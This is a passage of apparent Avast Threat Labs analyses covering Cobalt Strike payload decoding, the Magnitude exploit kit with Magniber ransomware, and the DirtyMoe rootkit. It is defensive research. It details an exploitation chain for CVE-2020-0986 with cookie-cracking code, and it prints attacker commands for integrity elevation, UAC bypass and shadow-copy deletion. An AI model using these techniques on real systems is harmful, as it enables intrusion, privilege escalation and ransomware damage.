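A minimal stdlib-only sketch (not the original snippet from the post) that handles both the gzip-wrapped and the raw deflate variants:

```python
import zlib

def decompress_payload(data: bytes) -> bytes:
    # Gzip streams start with the magic bytes 1f 8b; wbits=16+MAX_WBITS tells
    # zlib to expect the gzip wrapper, while -MAX_WBITS means raw deflate.
    if data[:2] == b"\x1f\x8b":
        return zlib.decompress(data, 16 + zlib.MAX_WBITS)
    return zlib.decompress(data, -zlib.MAX_WBITS)
```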

XOR encoding

The XOR algorithm is used in three different cases. The first case is a one-byte XOR inside PS1 scripts; the default key value is 35 (0x23).
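Combined with the Base64 row from the table above, the default key can be verified on a padded 8-character prefix of the truncated example string; the first decoded bytes come out as the usual fc e8 89 00 payload prologue:

```python
import base64

def xor1(data: bytes, key: int = 0x23) -> bytes:
    # single-byte XOR with the default PS1 key 0x23
    return bytes(b ^ key for b in data)

# First 8 Base64 characters of the "38uqIyMjQ6.." example above
decoded = xor1(base64.b64decode("38uqIyMj"))
print(decoded.hex())  # fce889000000
```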

The second case is an XOR with a dword key, used for encoding raw payloads or beacons inside PE stager binaries. The header for the XORed data is 16 bytes long and includes the start offset, the XORed data size, the XOR key and four 0x61 junk/padding bytes.

Python header parsing:
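A sketch following the layout described above (the dword order is assumed from that description: start offset, XORed data size, XOR key, then the four 0x61 bytes):

```python
import struct

def parse_xor_header(blob: bytes, off: int = 0):
    # Assumed layout: start offset | XORed data size | XOR key | 4x 0x61 ('a')
    start, size, key, junk = struct.unpack_from("<III4s", blob, off)
    assert junk == b"aaaa", "unexpected padding bytes"
    return start, size, key

def xor_dword(data: bytes, key: int) -> bytes:
    # repeating 4-byte (little-endian dword) XOR
    kb = struct.pack("<I", key)
    return bytes(b ^ kb[i % 4] for i, b in enumerate(data))
```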

We can create a Yara rule based on the XOR key from the header and the first dword of the encoded data to verify the expected values there:

The third case is XOR encoding with a rolling dword key, used only for decoding downloaded beacons. The encoded data blob is located right after the XOR algorithm code without any padding. The encoded data starts with an initial XOR key (a dword), followed by the data size (a dword XORed with the initial key).
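Assuming the commonly documented rolling scheme, in which each decoded dword updates the key (key ^= plaintext, which is equivalent to the next key being the previous ciphertext dword), a decode sketch could look like this:

```python
import struct

def rolling_xor_decode(blob: bytes) -> bytes:
    dwords = struct.unpack_from("<%dI" % (len(blob) // 4), blob)
    key = dwords[0]                      # initial XOR key
    size = dwords[1] ^ key               # data size, XORed with the initial key
    key ^= size                          # roll the key
    out = bytearray()
    for c in dwords[2:2 + (size + 3) // 4]:
        p = c ^ key
        out += struct.pack("<I", p)
        key ^= p                         # next key == this ciphertext dword
    return bytes(out[:size])
```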

There are x86 and x64 implementations of the XOR algorithm. Cobalt Strike resource includes xor.bin and xor64.bin files with precompiled XOR algorithm code. 

The default lengths of the compiled x86 code are 52 and 56 bytes (depending on the registers used), plus the length of the junk bytes. The x86 implementation allows different register sets, so the xor.bin file includes more than 800 different precompiled code variants.

Yara rule for covering all x86 variants with XOR verification:

The precompiled x64 code is 63 bytes long with no junk bytes. There is also only one precompiled code variant.

Yara rule for x64 variant with XOR verification:

You can find our Raw Payload decoder and extractor for the most common encodings here. It uses the parser from the previous chapter and can save you time and manual work. We also provide an IDAPython script for easy raw payload analysis.


As we see more and more abuse of Cobalt Strike by threat actors, understanding how to decode its use is important for malware analysis.

In this blog, we’ve focused on understanding how threat actors use Cobalt Strike payloads and how you can analyze them.

The next part of this series will be dedicated to Cobalt Strike beacons and parsing its configuration structure.

The post Decoding Cobalt Strike: Understanding Payloads appeared first on Avast Threat Labs.

Magnitude Exploit Kit: Still Alive and Kicking

29 July 2021 at 16:30

If I could choose one computer program and erase it from existence, I would choose Internet Explorer. Switching to a different browser would most likely save countless people from getting hacked. Not to mention all the headaches that web developers get when they are tasked with solving Internet Explorer compatibility issues. Unfortunately, I do not have the power to make Internet Explorer disappear. But seeing its browser market share continue to decline year after year at least gives me hope that one day it will be only a part of history.

While the overall trend looks encouraging, there are still some countries where the decline in Internet Explorer usage is lagging behind. An interesting example of this is South Korea, where until recently, users often had no choice but to use this browser if they wanted to visit a government or an e-commerce website. This was because of a law that seems very bizarre from today’s point of view: these websites were required to use ActiveX controls and were therefore only supported in Internet Explorer. Ironically, these controls were originally meant to provide additional security. While this law was finally dismantled in December 2020, Internet Explorer still has a lot of momentum in South Korea today. 

The attackers behind the Magnitude Exploit Kit (or Magniťůdek as we like to call it) are exploiting this momentum by running malicious ads that are currently shown only to South Korean Internet Explorer users. The ads can mostly be found on adult websites, which makes this an example of so-called adult malvertising. They contain code that exploits known vulnerabilities in order to give the attackers control over the victim’s computer. All the victim has to do is use a vulnerable version of Microsoft Windows and Internet Explorer, navigate to a page that hosts one of these ads and they will get the Magniber ransomware encrypting their computer.

The daily number of Avast users protected from Magnitude. Note the drop after July 9th, which is when the attacker’s account at one of the abused ad networks got terminated.


The Magnitude exploit kit, originally known as PopAds, has been around since at least 2012, which is an unusually long lifetime for an exploit kit. However, it’s not the same exploit kit today that it was nine years ago. Pretty much every part of Magnitude has changed multiple times since then. The infrastructure has changed, so has the landing page, the shellcode, the obfuscation, the payload, and most importantly, the exploits. Magnitude currently exploits an Internet Explorer memory corruption vulnerability, CVE-2021-26411, to get shellcode execution inside the renderer process and a Windows memory corruption vulnerability, CVE-2020-0986, to subsequently elevate privileges. A fully functional exploit for CVE-2021-26411 can be found on the Internet and Magnitude uses that public exploit directly, just with some added obfuscation on top. According to the South Korean cybersecurity company ENKI, this CVE was first used in a targeted attack against security researchers, which Google’s Threat Analysis Group attributed to North Korea.

Exploiting CVE-2020-0986 is a bit less straightforward. This vulnerability was first used in a zero-day exploit chain, discovered in-the-wild by Kaspersky researchers who named the attack Operation PowerFall. To the best of our knowledge, this is the first time this vulnerability is being exploited in-the-wild since that attack. Details about the vulnerability were provided in blog posts by both Kaspersky and Project Zero. While both these writeups contain chunks of the exploit code, it must have still been a lot of work to develop a fully functional exploit. Since the exploit from Magnitude is extremely similar to the code from the writeups, we believe that the attackers started from the code provided in the writeup and then added all the missing pieces to get a working exploit.

Interestingly, when we first discovered Magnitude exploiting CVE-2020-0986, it was not weaponized with any malicious payload. All it did after successful exploitation was ping its C&C server with the Windows build number of the victim. At the time, we theorized that this was just a testing version of the exploit and the attackers were trying to figure out which builds of Windows they could exploit before they fully integrated it into the exploit kit. And indeed, a week later we saw an improved version of the exploit and this time, it was carrying the Magniber ransomware as the payload.

Until recently, our detections for Magnitude were protecting on average about a thousand Avast users per day. That number dropped to roughly half after the compliance team of one of the ad networks used by Magnitude kicked the attackers out of their platform. Currently, all the protected users have a South Korean IP address, but just a few weeks back, Taiwanese Internet users were also at risk. Historically, South Korea and Taiwan were not the only countries attacked by Magnitude. Previous reports mention that Magnitude also used to target Hong Kong, Singapore, the USA, and Malaysia, among others. 

The Infrastructure

The Magnitude operators are currently buying popunder ads from multiple adult ad networks. Unfortunately, these ad networks allow them to very precisely target the ads to users who are likely to be vulnerable to the exploits they are using. They can only pay for ads shown to South Korean Internet Explorer users who are running selected versions of Microsoft Windows. This means that a large portion of users targeted by the ads is vulnerable and that the attackers do not have to waste much money on buying ads for users that they are unable to exploit. We reached out to the relevant ad networks to let them know about the abuse of their platforms. One of them successfully terminated the attacker’s account, which resulted in a clear drop in the number of Avast users that we had to protect from Magnitude every day.

Many ad networks allow the advertisers to target their ads only to IE users running specific versions of Windows.

When the malicious ad is shown to a victim, it redirects them through an intermediary URL to a page that serves an exploit for CVE-2021-26411. An example of this redirect chain is binlo[.]info -> fab9z1g6f74k.tooharm[.]xyz -> 6za16cb90r370m4u1ez.burytie[.]top. The first domain, binlo[.]info, is the one that is visible to the ad network. When this domain is visited by someone not targeted by the campaign, it just presents a legitimate-looking decoy ad. We believe that the purpose of this decoy ad is to make the malvertising seem legitimate to the ad network. If someone from the ad network were to verify the ad, they would only see the decoy and most likely conclude that it is legitimate.

One of the decoy ads used by Magnitude. Note that this is nothing but a decoy: there is no reason to believe that SkinMedica would be in any way affiliated with Magnitude.

The other two domains (tooharm[.]xyz and burytie[.]top) are designed to be extremely short-lived. In fact, the exploit kit rotates these domains every thirty minutes and doesn’t reuse them in any way. This means that the exploit kit operators need to register at least 96 domains every day! In addition to that, the subdomains (fab9z1g6f74k.tooharm[.]xyz and 6za16cb90r370m4u1ez.burytie[.]top) are uniquely generated per victim. This makes the exploit kit harder to track and protect against (and more resilient against takedowns) because detection based on domain names is not very effective.

The JavaScript exploit for CVE-2021-26411 is obfuscated with what appears to be a custom obfuscator. The obfuscator is being updated semi-regularly, most likely in an attempt to evade signature-based detection. The obfuscator is polymorphic, so each victim gets a uniquely obfuscated exploit. Other than that, there are not many interesting things to say about the obfuscation, it does the usual things like hiding string/numeric constants, renaming function names, hiding function calls, and more. 

A snippet of the obfuscated JavaScript exploit for CVE-2021-26411

After deobfuscation, this exploit is an almost exact match to a public exploit for CVE-2021-26411 that is freely available on the Internet. The only important change is in the shellcode, where Magnitude obviously provides its own payload. 


The shellcode is sometimes wrapped in a simple packer that uses redundant jmp instructions for obfuscation. This obfuscates every function by randomizing the order of instructions and then adding a jmp instruction between each two consecutive instructions to preserve the original control flow. As with other parts of the shellcode, the order is randomly generated on the fly, so each victim gets a unique copy of the shellcode.

Function obfuscated by redundant jmp instructions. It allocates memory by invoking the NtAllocateVirtualMemory syscall.

As shown in the above screenshot, the exploit kit prefers not to use standard Windows API functions and instead often invokes system calls directly. The function above uses the NtAllocateVirtualMemory syscall to allocate memory. However, note that this exact implementation only works on Windows 10 under the WoW64 subsystem. On other versions of Windows, the syscall numbers are different, so the syscall number 0x18 would denote some other syscall. This implementation also wouldn't work on native 32-bit Windows, because there it does not make sense to call the FastSysCall pointer at FS:[0xC0].

To get around these problems, this shellcode comes in several variants, each custom-built for a specific version of Windows. Each variant then contains hardcoded syscall numbers fitting the targeted version. Magnitude selects the correct shellcode variant based on the User-Agent string of the victim. But sometimes, knowing the major release version and bitness of Windows is not enough to deduce the correct syscall numbers. For instance, the syscall number for NtOpenProcessToken on 64-bit Windows 10 differs between versions 1909 and 20H2. In such cases, the shellcode obtains the victim’s exact NtBuildNumber from KUSER_SHARED_DATA and uses a hardcoded mapping table to resolve that build number into the correct syscall number. 

Currently, there are only three variants of the shellcode. One for Windows 10 64-bit, one for Windows 7 64-bit, and one for Windows 7 32-bit. However, it is very much possible that additional variants will get implemented in the future.

To facilitate frequent syscall invocation, the shellcode makes use of what we call syscall templates. Below, you can see the syscall template it uses in the WoW64 Windows 10 variant. Every time the shellcode is about to invoke a syscall, it first customizes this template for the syscall it intends to invoke by patching the syscall number (the immediate in the first instruction) and the immediates from the retn instructions (which specify the number of bytes to release from the stack on function return). Once the template is customized, the shellcode can call it and it will invoke the desired syscall. Also, note the branching based on the value at offset 0x254 of the Process Environment Block. This is most likely the malware authors trying to check a field sometimes called dwSystemCallMode to find out if the syscall should be invoked directly using int 0x2e or through the FastSysCall transition.

Syscall template from the WoW64 Windows 10 variant

Now that we know how the shellcode is obfuscated and how it invokes syscalls, let’s get to what it actually does. Note that the shellcode expects to run within the IE’s Enhanced Protected Mode (EPM) sandbox, so it is relatively limited in what it can do. However, the EPM sandbox is not as strict as it could be, which means that the shellcode still has limited filesystem access, public network access and can successfully call many API functions. Magnitude wants to get around the restrictions imposed by the sandbox and so the shellcode primarily functions as a preparation stage for the LPE exploit which is intended to enable Magnitude to break out of the sandbox.

The first thing the shellcode does is that it obtains the integrity level of the current process. There are two URLs embedded in the shellcode and the integrity level is used to determine which one should be used. Both URLs contain a subdomain that is generated uniquely per victim and are protected so that only the intended victim will get any response from them. If the integrity level is Low or Untrusted, the shellcode reaches out to the first URL and downloads an encrypted LPE exploit from there. The exploit is then decrypted using a simple xor-based cipher, mapped into executable memory, and executed.

On the other hand, if the integrity level is Medium or higher, the shellcode determines that it is not running in a sandbox and it skips the LPE exploit. In such cases, it downloads the final payload (currently Magniber ransomware) from the second URL, decrypts it, and then starts searching for a process that it could inject this payload into. For the 64-bit Windows shellcode variants, the target process needs to satisfy all of the following conditions:

  • The target process name is not iexplore.exe
  • The integrity level of the target process is not Low or Untrusted
  • The integrity level of the target process is not higher than the integrity level of the current process
  • The target process is not running in the WoW64 environment
  • (The target process can be opened with PROCESS_QUERY_INFORMATION)

Once a suitable target process is found, the shellcode jumps through the Heaven’s Gate (only in the WoW64 variants) and injects the payload into the target process using the following sequence of syscalls: NtOpenProcess -> NtCreateSection -> NtMapViewOfSection -> NtCreateThreadEx -> NtGetContextThread -> NtSetContextThread -> NtResumeThread. Note that in this execution chain, everything happens purely in memory and this is why Magnitude is often described as a fileless exploit kit. However, the current version is not entirely fileless because, as will be shown in the next section, the LPE exploit drops a helper PE file to the filesystem.

The shellcode’s transition through the Heaven’s Gate


Magnitude escapes the EPM sandbox by exploiting CVE-2020-0986, a memory corruption vulnerability in splwow64.exe. Since the vulnerable code is running with medium integrity and a low integrity process can trigger it using Local Procedure Calls (LPC), this vulnerability can be used to get from the EPM sandbox to medium integrity. CVE-2020-0986 and the ways to exploit it are already discussed in detail in blog posts by both Kaspersky and Project Zero. This section will therefore focus on Magnitude’s implementation of the exploit, please refer to the other blog posts for further technical details about the vulnerability. 

The vulnerable code from gdi32.dll can be seen below. It is a part of an LPC server and it can be triggered by an LPC call, with both r8 and rdi pointing into a memory section that is shared between the LPC client and the LPC server. This essentially gives the attacker the ability to call memcpy inside the splwow64 process while having control over all three arguments, which can be immediately converted into an arbitrary read/write primitive. Arbitrary read is just a call to memcpy with the dest being inside the shared memory and src being the target address. Conversely, arbitrary write is a call to memcpy with the dest being the target address and the src being in the shared memory.

The vulnerable code from gdi32.dll. When it gets executed, both r8 and rdi are pointing into attacker-controllable memory.

However, there is one tiny problem that makes exploitation a bit more difficult. As can be seen in the disassembled code above, the count of the memcpy is obtained by adding the dereferenced content of two word pointers, located close by the src address. This is not a problem for (smaller) arbitrary writes, since the attacker can just plant the desired count beforehand into the shared memory. But for arbitrary reads, the count is not directly controllable by the attacker and it can be anywhere between 0 and 0x1FFFE, which could either crash splwow64 or perform a memcpy with either zero or a smaller than desired count. To get around this, the attacker can perform arbitrary reads by triggering the vulnerable code twice. The first time, the vulnerability can be used as an arbitrary write to plant the correct count at the necessary offset and the second time, it can be used to actually read the desired memory content. This technique has some downsides, such as that it cannot be used to read non-writable memory, but that is not an issue for Magnitude.

The exploit starts out by creating a named mutex to make sure that there is only a single instance of it running. Then, it calls CreateDCW to spawn the splwow64 process that is to be exploited and performs all the necessary preparations to enable sending LPC messages to it later on. The exploit also contains an embedded 64-bit PE file, which it drops to %TEMP% and executes from there. This PE file serves two different purposes and decides which one to fulfill based on whether there is a command-line argument or not. The first purpose is to gather various 64-bit pointers and feed them back to the main exploit module. The second purpose is to serve as a loader for the final payload once the vulnerability has been successfully exploited.

There are three pointers that are obtained by the dropped 64-bit PE file when it runs for the first time. The first one is the address of fpDocumentEvent, which stores a pointer to DocumentEvent, protected using the EncodePointer function. This pointer is obtained by scanning gdi32.dll (or gdi32full.dll) for a static sequence of instructions that set the value at this address. The second pointer is the actual address of DocumentEvent, as exported from winspool.drv and the third one is the pointer to system, exported from msvcrt.dll. Once the 64-bit module has all three pointers, it drops them into a temporary file and terminates itself.

The exploit scans gdi32.dll for the sequence of the four underlined instructions and extracts the address of fpDocumentEvent from the operands of the last instruction.
The exploit extracting the address of fpDocumentEvent from gdi32.dll

The main 32-bit module then reads the dropped file and uses the obtained values during the actual exploitation, which can be characterized by the following sequence of actions:

  1. The exploit leaks the value at the address of fpDocumentEvent in the splwow64 process. The value is leaked by sending two LPC messages, using the arbitrary read primitive described above.
  2. The leaked value is an encoded pointer to DocumentEvent. Using this encoded pointer and the actual, raw, pointer to DocumentEvent, the exploit cracks the secret value that was used for pointer encoding. Read the Kaspersky blog post for how this can be done.
  3. Using the obtained secret value, the exploit encodes the pointer to system, so that calling the function DecodePointer on this newly encoded value inside splwow64 will yield the raw pointer to system.
  4. Using the arbitrary write primitive, the exploit overwrites fpDocumentEvent with the encoded pointer to system.
  5. The exploit triggers the vulnerable code one more time. Only this time, it is not interested in any memory copying, so it sets the count for memcpy to zero. Instead, it counts on the fact that splwow64 will try to decode and call the pointer at fpDocumentEvent. Since this pointer was substituted in the previous step, splwow64 will call system instead of DocumentEvent. The first argument to DocumentEvent is read from the shared memory section, which means that it is controllable by the attacker, who can therefore pass an arbitrary command to system. 
  6. Finally, the exploit uses the arbitrary write primitive one last time and restores fpDocumentEvent to its original value. This is an attempt to clean up after the exploit, but splwow64 might still be unstable because a random pointer got corrupted when the exploit planted the necessary count of the leak during the first step.
The exploit cracking the secret used for encoding fpDocumentEvent
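In user mode on 64-bit Windows, EncodePointer is commonly implemented as rotating ptr ^ cookie right by cookie & 0x3F bits. Under that assumption, one known raw/encoded pair (here, DocumentEvent) lets the per-process cookie be brute-forced over the 64 possible rotations; a sketch of the idea behind step 2:

```python
MASK64 = (1 << 64) - 1

def rotr64(v: int, n: int) -> int:
    n &= 63
    return ((v >> n) | (v << (64 - n))) & MASK64

def rotl64(v: int, n: int) -> int:
    n &= 63
    return ((v << n) | (v >> (64 - n))) & MASK64

def encode_pointer(ptr: int, cookie: int) -> int:
    # assumed user-mode EncodePointer: ROR64(ptr ^ cookie, cookie & 0x3F)
    return rotr64(ptr ^ cookie, cookie & 0x3F)

def crack_cookie(raw_ptr: int, encoded_ptr: int) -> list:
    # Try all 64 rotations; a candidate is valid if its low 6 bits match the
    # rotation that produced it. More than one candidate can pass, so a second
    # known pointer pair can be used to disambiguate.
    return [rotl64(encoded_ptr, rot) ^ raw_ptr
            for rot in range(64)
            if ((rotl64(encoded_ptr, rot) ^ raw_ptr) & 0x3F) == rot]
```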

The command that Magnitude executes in the call to system looks like this:

icacls <dropped_64bit_PE> /Q /C /setintegritylevel Medium && <dropped_64bit_PE>

This elevates the dropped 64-bit PE file to medium integrity and executes it for the second time. This time, it will not gather any pointers, but it will instead extract an embedded payload from within itself and inject it into a suitable process. Currently, the injected payload is the Magniber ransomware.


Magniber emerged in 2017 when Magnitude started deploying it as a replacement for the Cerber ransomware. Even though it is almost four years old, it still gets updated frequently and so a lot has changed since it was last written about. The early versions featured server-side AES key generation and contained constant fallback encryption keys in case the server was unreachable. A decryptor that worked when encryption was performed using these fallback keys was developed by the Korea Internet & Security Agency and published on No More Ransom. The attackers responded to this by updating Magniber to generate the encryption keys locally, but the custom PRNG based on GetTickCount was very weak, so researchers from Kookmin University were able to develop a method to recover the encrypted files. Unfortunately, Magniber got updated again, and it is currently using the custom PRNG shown below. This function is used to generate a single random byte and it is called 32 times per encrypted file (16 times to generate the AES-128 key and 16 times to generate the IV). 

While this PRNG still looks very weak at first glance, we believe there is no reasonably efficient method to attack it. The tick count is not the problem here: it is with extremely high probability going to be constant throughout all iterations of the loop and its value could be guessed by inspecting event logs and timestamps of the encrypted files. The problem lies in the RtlRandomEx function, which gets called 640 times (2 * 10 * (16 + 16)) per each encrypted file. This means that the function is likely going to get called millions of times during encryption and leaking and tracking its internal state throughout all of these calls unfortunately seems infeasible. At best, it might be possible to decrypt the first few encrypted files. And even that wouldn’t be possible on newer CPUs and Windows versions, because RtlRandomEx there internally uses the rdrand instruction, which arguably makes this a somewhat decent PRNG for cryptography. 

The PRNG used by Magniber to generate encryption keys

The ransomware starts out by creating a named mutex and generating an identifier from the victim’s computer name and volume serial number. Then, it enumerates in random order all logical drives that are not DRIVE_NO_ROOT_DIR or DRIVE_CDROM and proceeds to recursively traverse them to encrypt individual files. Some folders, such as sample music or tor browser, are excluded from encryption, same as all hidden, system, readonly, temporary, and virtual files. The full list of excluded folders can be found in our IoC repository.

Just like many other ransomware strains, Magniber only encrypts files with certain preselected extensions, such as .doc or .xls. Its configuration contains two sets of extension hashes and each file gets encrypted only if the hash of its extension can be found in one of these sets. The division into two sets was presumably done to assign priority to the extensions. Magniber goes through the whole filesystem in two sweeps. In the first one, it encrypts files with extensions from the higher-priority set. In the second sweep, it encrypts the rest of the files with extensions from the lower-priority set. Interestingly, the higher-priority set also contains nine extensions that were additionally obfuscated, unlike the rest of the higher-priority set. It seems that the attackers were trying to hide these extensions from reverse engineers. You can find these and the other extensions that Magniber encrypts in our IoC repository.

To encrypt a file, Magniber first generates a random 128-bit AES key and IV using the PRNG discussed above. For some bizarre reason, it only chooses to generate bytes from the range 0x03 to 0xFC, effectively reducing the size of the keyspace from 256^16 to 250^16. Magniber then reads the input file by chunks of up to 0x100000 bytes, continuously encrypting each chunk in CBC mode and writing it back to the input file. Once the whole file is encrypted, Magniber also encrypts the AES key and IV using a public RSA key embedded in the sample and appends the result to the encrypted file. Finally, Magniber renames the file by appending a random-looking extension to its name.

However, there is a bug in the encryption process that puts some encrypted files into a nonrecoverable state, where it is impossible to decrypt them, even for the attackers who possess the corresponding private RSA key. This bug affects all files with a size that is a multiple of 0x100000 (1 MiB). To understand this bug, let’s first investigate in more detail how individual files get encrypted. Magniber splits the input file into chunks and treats the last chunk differently. When the last chunk is encrypted, Magniber sets the Final parameter of CryptEncrypt to TRUE, so CryptoAPI can add padding and finalize the encryption. Only after the last chunk gets encrypted does Magniber append the RSA-encrypted AES key to the file. 

The bug lies in how Magniber determines that it is currently encrypting the last chunk: it treats only chunks of size less than 0x100000 as the last chunks. But this does not work for files the size of which is a multiple of 0x100000, because even the last chunk of such files contains exactly 0x100000 bytes. When Magniber is encrypting such files, it never registers that it is encrypting the last chunk, which causes two problems. The first problem is that it never calls CryptEncrypt with Final=TRUE, so the encrypted files end up with invalid padding. The second, much bigger, problem is that Magniber also does not append the RSA-encrypted AES key, because the trigger for appending it is the encryption of the last chunk. This means that the AES key and IV used for the encryption of the file get lost and there is no way to decrypt the file without them.
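The faulty last-chunk test can be modeled in a few lines (a simplified sketch of the loop logic described above, not Magniber's actual code):

```python
CHUNK = 0x100000  # 1 MiB

def finalizes(file_size: int) -> bool:
    """Model of Magniber's loop: only a short chunk is treated as the last one."""
    offset, finalized = 0, False
    while offset < file_size:
        n = min(CHUNK, file_size - offset)
        if n < CHUNK:          # bug: the test should be offset + n == file_size
            finalized = True   # Final=TRUE for CryptEncrypt, RSA key blob appended
        offset += n
    return finalized

print(finalizes(CHUNK))      # False: the AES key is never appended
print(finalizes(CHUNK + 1))  # True
```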

Magniber’s ransom note

Magniber drops its ransom note into every folder where it encrypted at least one file. An extra ransom note is also dropped into %PUBLIC% and opened up automatically in notepad.exe after encryption. The ransom note contains several URLs leading the victims to the payment page, which instructs them on how to pay the ransom in order to obtain the decryptor. These URLs are unique per victim, with the subdomain representing the victim identifier. Magniber also automatically opens up the payment page in the victim’s browser and while doing so, exfiltrates further information about the ransomware deployment through the URL, such as:

  • The number of encrypted files
  • The total size of all encrypted files
  • The number of encrypted logical drives
  • The number of files encountered (encrypted or not)
  • The version of Windows
  • The victim identifier
  • The version of Magniber

Finally, Magniber attempts to delete shadow copies using a UAC bypass. It writes a command to delete them to HKCU\Software\Classes\mscfile\shell\open\command and then executes CompMgmtLauncher.exe assuming that this will run the command with elevated privileges. But since this particular UAC bypass method was fixed in Windows 10, Magniber also contains another bypass method, which it uses exclusively on Windows 10 machines. This other method works similarly, writing the command to HKCU\Software\Classes\ms-settings\shell\open\command, creating a key named DelegateExecute there, and finally running ComputerDefaults.exe. Interestingly, the command used is regsvr32.exe scrobj.dll /s /u /n /i:%PUBLIC%\readme.txt. This is a technique often referred to as Squiblydoo and it is used to run a script dropped into readme.txt, which is shown below.

The scriptlet dropped to readme.txt, designed to delete shadow copies

Conclusion

In this blog post, we examined in detail the current state of the Magnitude exploit kit. We described how it exploits CVE-2021-26411 and CVE-2020-0986 to deploy ransomware to unfortunate victims who browse the Internet using vulnerable builds of Internet Explorer. We found Magnitude to be a mature exploit kit with a very robust infrastructure. It uses thousands of fresh domains each month and its infection chain is composed of seven stages (not even counting the multiple obfuscation layers). The infrastructure is also well protected, which makes it very challenging for malware analysts to track and research the exploit kit.

We also dug deep into the Magniber ransomware. We found a bug that results in some files being encrypted in such a way that even the attackers cannot possibly decrypt them. This underscores the unfortunate fact that paying the ransom is never a guarantee of getting the ransomed files back. This is one of the reasons why we urge ransomware victims to try to avoid paying the ransom.

Even though the attackers behind Magnitude appear to have a good grasp on exploit development, obfuscation, and protection of malicious infrastructure, they seem to have no idea what they are doing when it comes to generating random numbers for cryptographic purposes. This resulted in previous versions of Magniber using flawed PRNGs, which allowed malware researchers to develop decryptors that helped victims recover their ransomed files. However, Magniber was always quick to improve their PRNG, which unfortunately made the decryptors obsolete. The current version of Magniber is using a PRNG that seems to be just secure enough, which makes us believe that there will be no more decryptors in the future.

Indicators of Compromise (IoC)

The full list of IoCs is available at

Redirection page
SHA-256 Note
5d0e45febd711f7564725ac84439b74d97b3f2bc27dbe5add5194f5cdbdbf623 Win10 WoW64 variant
351a2e8a4dc2e60d17208c9efb6ac87983853c83dae5543e22674a8fc5c05234 ^ unpacked
4044008da4fc1d0eb4a0242b9632463a114b2129cedf9728d2d552e379c08037 Win7 WoW64 variant
1ea23d7456195e8674baa9bed2a2d94c7235d26a574adf7009c66d6ec9c994b3 ^ unpacked
3de9d91962a043406b542523e11e58acb34363f2ebb1142d09adbab7861c8a63 Win7 native variant
dfa093364bf809f3146c2b8a5925f937cc41a99552ea3ca077dac0f389caa0da ^ unpacked
e05a4b7b889cba453f02f2496cb7f3233099b385fe156cae9e89bc66d3c80a7f newer Win7 WoW64 variant
ae930317faf12307d3fb9a534fe977a5ef3256e62e58921cd4bf70e0c05bf88a latest Win7 WoW64 variant
SHA-256 Note
440be2c75d55939c90fc3ef2d49ceeb66e2c762fd4133c935667b3b2c6fb8551 pingback payload
a5edae721568cdbd8d4818584ddc5a192e78c86345b4cdfb4dc2880b9634acab pingback payload
1505368c8f4b7bf718ebd9a44395cfa15657db97a0c13dcf47eb8cfb94e7528b Magniber payload
63525e19aad0aae1b95c3a357e96c93775d541e9db7d4635af5363d4e858a345 Magniber payload
31e99c8f68d340fd046a9f6c8984904331dc6a5aa4151608058ee3aabc7cc905 Magniber payload
Pointer scanner/loader 64-bit module

Decoy ad domains

The post Magnitude Exploit Kit: Still Alive and Kicking appeared first on Avast Threat Labs.

DirtyMoe: Rootkit Driver

11 August 2021 at 09:44


In the first post, DirtyMoe: Introduction and General Overview of Modularized Malware, we described a complex and sophisticated piece of malware called DirtyMoe. Its main observed roles are cryptojacking and DDoS attacks, both of which remain popular. There is no doubt that the malware has been released for profit, and all evidence points to Chinese territory. In most cases, the PurpleFox campaign is used to exploit vulnerable systems: the exploit gains the highest privileges and installs the malware via an MSI installer. In short, the installer misuses the Windows System Event Notification Service (SENS) for the malware deployment. At the end of the deployment, two processes (workers) execute malicious activities received from well-concealed C&C servers.

As we mentioned in the first post, every advanced malware implements a set of protection, anti-forensics, anti-tracking, and anti-debugging techniques. One of the most common techniques for hiding malicious activity is the use of rootkits. In general, the main goal of a rootkit is to hide itself and other modules of the hosted malware at the kernel layer. Rootkits are potent tools but carry a high risk of detection because they work in kernel mode, where each critical bug leads to a BSoD.

The primary aim of this article is to analyze the rootkit techniques that DirtyMoe uses. The main part of this study examines the functionality of the DirtyMoe driver, aiming to provide comprehensive information about it in terms of static and dynamic analysis. The key techniques of the DirtyMoe rootkit can be listed as follows: the driver can hide itself and other malware activities in both kernel and user mode. Moreover, the driver can execute commands received from user mode with kernel privileges. Another significant aspect of the driver is the injection of an arbitrary DLL file into targeted processes. Last but not least is the driver's ability to censor the file system content. We also describe the refined routine that deploys the driver into the kernel and the anti-forensic methods the malware authors used.

Another essential point of this research is the investigation of the driver's metadata, which showed that the driver is code-signed with certificates that were stolen and revoked in the past. However, these certificates are widespread in the wild and are still misused by other malicious software today.

Finally, the last part summarizes the rootkit functionality and draws together the key findings on the digital certificates, making a link between DirtyMoe and other malicious software. In addition, we discuss the implementation level and likely sources of the rootkit techniques used.

1. Sample

The subject of this research is a sample with SHA-256:
The sample is a Windows driver that DirtyMoe drops on system startup.

Note: 44 of 71 AV engines (62%) registered on VirusTotal detect the sample as malicious. By comparison, the DirtyMoe DLL file is detected by 86% of registered AVs. The detection coverage is nonetheless sufficient, since the driver is dumped from the DLL file.

Basic Information
  • File Type: Portable Executable 64
  • File Info: Microsoft Visual C++ 8.0 (Driver)
  • File Size: 116.04 KB (118824 bytes)
  • Digital Signature: Shanghai Yulian Software Technology Co., Ltd. (上海域联软件技术有限公司)

The driver imports two libraries, FltMgr and ntoskrnl. Table 1 summarizes the most suspicious methods from the driver's import table.

Routine Description
FltSetCallbackDataDirty A minifilter driver’s pre or post operation calls the routine to indicate that it has modified the contents of the callback data structure.
FltGetRequestorProcessId Returns the process ID of the process that requested a given I/O operation.
FltRegisterFilter FltRegisterFilter registers a minifilter driver.
Routines delete, set, query, and open registry entries in kernel-mode.
ZwTerminateProcess Routine terminates a process and all of its threads in kernel-mode.
ZwQueryInformationProcess Retrieves information about the specified process.
MmGetSystemRoutineAddress Returns a pointer to a function specified by a routine parameter.
ZwAllocateVirtualMemory Reserves a range of application-accessible virtual addresses in the specified process in kernel-mode.
Table 1. Kernel methods imported by the DirtyMoe driver

At first glance, the driver looks up kernel routines via MmGetSystemRoutineAddress() as a form of obfuscation, since the string table contains names of routines operating with virtual memory; e.g., ZwProtectVirtualMemory(), ZwReadVirtualMemory(), ZwWriteVirtualMemory(). The kernel routine ZwQueryInformationProcess() and strings such as services.exe and winlogon.exe point out that the rootkit probably works with kernel structures of critical Windows processes.

2. DirtyMoe Driver Analysis

The DirtyMoe driver does not execute any specific malware activities itself. Instead, it provides a wide range of rootkit and backdoor techniques. The driver has been designed as a support system for the DirtyMoe service in user mode.

The driver can perform actions that normally require high privileges, such as writing a file into the system folder, writing to the system registry, or killing an arbitrary process. The user-mode malware just sends a defined control code and data to the driver, which carries out the privileged action.

